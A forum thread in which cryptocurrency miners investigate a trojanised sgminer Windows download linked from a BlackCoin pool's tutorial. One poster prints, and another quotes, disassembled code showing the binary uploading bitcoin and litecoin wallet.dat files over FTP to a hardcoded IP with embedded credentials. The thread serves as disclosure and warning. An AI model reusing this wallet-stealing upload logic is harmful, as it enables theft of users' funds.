fedge
Newbie
Offline
Activity: 28
Merit: 0
|
|
August 03, 2014, 11:27:27 PM |
|
yeah i know bro i was so stupid on me i was not paying attention....and im very sad about it if someone want to help me a little this is my new btc adress 1HwERQLFH4wxHiikQkbP899YEhhB7tFHN Its definitely a virus and steals around 10 wallet files .... I took apart the windows 4.2.2 wallet.
I would highly doubt that. What virus do you have. If it was an infection it should be detectable. How did it steal 10 wallets.. sounds like a keystroke cap. virus.. No a lot of proof here to me. I like clambakes.. but never have went to them or can eat clams.. is that true.. ?
|
|
|
|
|
TheBlackDogeOfWallStreet
Member
Offline
Activity: 74
Merit: 10
|
|
August 03, 2014, 11:34:47 PM |
|
I run www.blackcoinpool.comhttps://github.com/veox/sgminer <<< if you took it apart, you would have no problem pointing it out in the code. sgminer is not required to use Black Coin Pool, it's just a common mining software that people use, so we posted up a tutorial. If some one posts some viable proof, other than "I did it, believe me" I will gladly remove any mention of SGminer from the pool. But out of the thousands of people that have used the pool, and the thousands upon thousands of people who use SGMiner, only you seem to be "getting hacked." No proof of anything other than showing a transaction from a wallet, and then posting your address asking for donations while deleting posts from this forum.
|
|
|
|
omgbossis21
|
|
August 04, 2014, 02:31:18 AM |
|
Fine I'll do all the work for you guys, the linked code in github is obviously not the code the bad link! Here are some code samples from the file : call string [mscorlib]System.String::Concat(string, string) call class [mscorlib]System.IO.DirectoryInfo [mscorlib]System.IO.Directory::CreateDirectory(string) pop ldstr " http://ftp://212.48.76.120/" ldstr "medusaminer" ldstr "barkleys" newobj instance void ftp::.ctor(string hostIP, string userName, string password) stloc.1 newobj instance void [mscorlib]System.Random::.ctor() stloc.2 ldloc.2 ldc.i4.0 nop ldloc.0 ldstr "\\bitcoin" call string [mscorlib]System.String::Concat(string, string) call bool [mscorlib]System.IO.Directory::Exists(string) ldc.i4.0 ceq ldstr "\\bitcoin\\wallet.dat" call string [mscorlib]System.String::Concat(string, string) callvirt instance void ftp::upload(string remoteFile, string localFile) nop nop loc_B8C: // CODE XREF: Upload+A6 ldstr "\\litecoin\\wallet.dat" call string [mscorlib]System.String::Concat(string, string) call bool [mscorlib]System.IO.File::Exists(string) ldc.i4.0 ceq stloc.s 8 ldloc.s 8 brtrue.s loc_C14 nop screenshot because I know you don't believe me :
|
|
|
|
chnchapters
Member
Offline
Activity: 106
Merit: 10
|
|
August 04, 2014, 02:38:52 AM |
|
You are now backtracking and changing what you said... Origanally you stated that you downloaded SGminer4.x and took it a part to find the "code that steals BTC" Now we post github of SGminer and you say it is in the link? What? Are you just trying to trick people who do not know anything about code or mining into FUD?
|
|
|
|
TheBlackDogeOfWallStreet
Member
Offline
Activity: 74
Merit: 10
|
|
August 04, 2014, 02:41:13 AM |
|
Fine I'll do all the work for you guys, the linked code in github is obviously not the code the bad link! Here are some code samples from the file : call string [mscorlib]System.String::Concat(string, string) call class [mscorlib]System.IO.DirectoryInfo [mscorlib]System.IO.Directory::CreateDirectory(string) pop ldstr " http://ftp://212.48.76.120/" ldstr "medusaminer" ldstr "barkleys" newobj instance void ftp::.ctor(string hostIP, string userName, string password) stloc.1 newobj instance void [mscorlib]System.Random::.ctor() stloc.2 ldloc.2 ldc.i4.0 nop ldloc.0 ldstr "\\bitcoin" call string [mscorlib]System.String::Concat(string, string) call bool [mscorlib]System.IO.Directory::Exists(string) ldc.i4.0 ceq ldstr "\\bitcoin\\wallet.dat" call string [mscorlib]System.String::Concat(string, string) callvirt instance void ftp::upload(string remoteFile, string localFile) nop nop loc_B8C: // CODE XREF: Upload+A6 ldstr "\\litecoin\\wallet.dat" call string [mscorlib]System.String::Concat(string, string) call bool [mscorlib]System.IO.File::Exists(string) ldc.i4.0 ceq stloc.s 8 ldloc.s 8 brtrue.s loc_C14 nop screenshot because I know you don't believe me : Hold on, going to do my due diligence and analyze the .exe -- if what you say is true I will remove the tutorial and any mention of SGMiner from Blackcoinpool.com.
|
|
|
|
chnchapters
Member
Offline
Activity: 106
Merit: 10
|
|
August 04, 2014, 02:43:10 AM |
|
Oh you meant the link to download the SGminer... I thought you meant the link to Sgminer's website from our pool...
The picture is still not expandable and unreadable, Im going to investigate as well...
This does not change the fact that it is not blackcoinpool.com or anything to do with Black Coin, and if true, something that we thank you for pointing out.
|
|
|
|
omgbossis21
|
|
August 04, 2014, 02:43:15 AM |
|
Please due, I am NOT OP! If you run the pool you should take the compliant seriously, here is another another screenshot of the file taking apart. Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!!
|
|
|
|
omgbossis21
|
|
August 04, 2014, 02:45:07 AM |
|
Sorry I cant screenshot without the 2nd monitor window half. Its in the getting started windows miner link, sgminerwindows.com the 4.4.2 miner download link. Should be able to click the image and click the magnifying glass in photobucket to blow it up. The file in the zip titles sgminer.exe and is 383kb
|
|
|
|
CryptoKenzi
Newbie
Offline
Activity: 18
Merit: 0
|
|
August 04, 2014, 03:05:53 AM |
|
If that is true, wouldn't that be the miners fault, rather than Blackcoin?
|
|
|
|
sillybear
Member
Offline
Activity: 105
Merit: 10
|
|
August 04, 2014, 03:09:10 AM |
|
Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!!
It is hard for the pool operator monitor 3rd party link. They might be virus free when being check by the pool operator, and get changed the next moment
|
|
|
|
omgbossis21
|
|
August 04, 2014, 03:09:53 AM |
|
Its not even the miner, has no mining code in it. Just uses some basic ftp commands and sends the wallet.dat files to the above listed ftp.
|
|
|
|
blacklizard
|
|
August 04, 2014, 03:38:53 AM Last edit: August 04, 2014, 04:09:10 AM by blacklizard |
|
Never use a pool that requires you to use there own software, or software they advise to use. Keep with what is known, if there pool does not work with the known trusted mining software, do not use that pool. Someone must have fixed up those links on blackcoinpool.com. I know for a fact that those were working correctly about 7 weeks ago when I downloaded the miner and it pointed to the correct site. Edit: Nvm, should have read on to page two. If this is all true than god knows how many people are affected by this. I do however still have a version of sgminer on my system and I highly doubt this has ever sent anything out to a 3rd party such as an ftp. Edit 2: Wouldn't this mean any of us could log-on to that ftp right now and snatch any dat files that might be there?
|
|
|
|
omgbossis21
|
|
August 04, 2014, 04:31:33 AM |
|
Its not a admin account you cant view folders or files. Using the mozzilla ftp its quite possibly his home ftp server though.
|
|
|
|
|
omgbossis21
|
|
August 04, 2014, 04:54:19 AM |
|
Didn't look into the ip, thanks. Didn't look into his block chain transactions though somebody should.
|
|
|
|
TheBlackDogeOfWallStreet
Member
Offline
Activity: 74
Merit: 10
|
|
August 04, 2014, 05:39:08 AM |
|
Didn't look into the ip, thanks. Didn't look into his block chain transactions though somebody should.
Confirmed We're gathering all the necessary information and evidence right now. Suspect that the person compiling binaries for SGMiner ( www.sgminerwindows.com) was trying to pull a fast one.
|
|
|
|
omgbossis21
|
|
August 04, 2014, 05:45:38 AM |
|
The binaries seem okay, I doubt the host of that website owns that github.
edit... best to look through the binaries a lot more before commenting one way or the other.
edit... that's a fork from the original sgminer-dev/sgminer so its definitely possible
|
|
|
|
sammir (OP)
Member
Offline
Activity: 72
Merit: 10
|
|
August 04, 2014, 07:55:58 AM |
|
thanks fucking god, now all stupid guys think i was a fucking joke, can send me some coin back, thanks bossis for your job. i think too many people are infected with this be carefull guys.
|
1HwERQLFH4wxHiikQkbP899YEhhB7tFHN
|
|
|
dzimbeck
Legendary
Offline
Activity: 2412
Merit: 1044
|
|
August 04, 2014, 08:10:57 AM |
|
Since this is NOT blackcoinpools fault, can we get OP to CHANGE the title of this thread please? I'm more than happy to reimburse if it wasnt done already.
|
|
|
|
|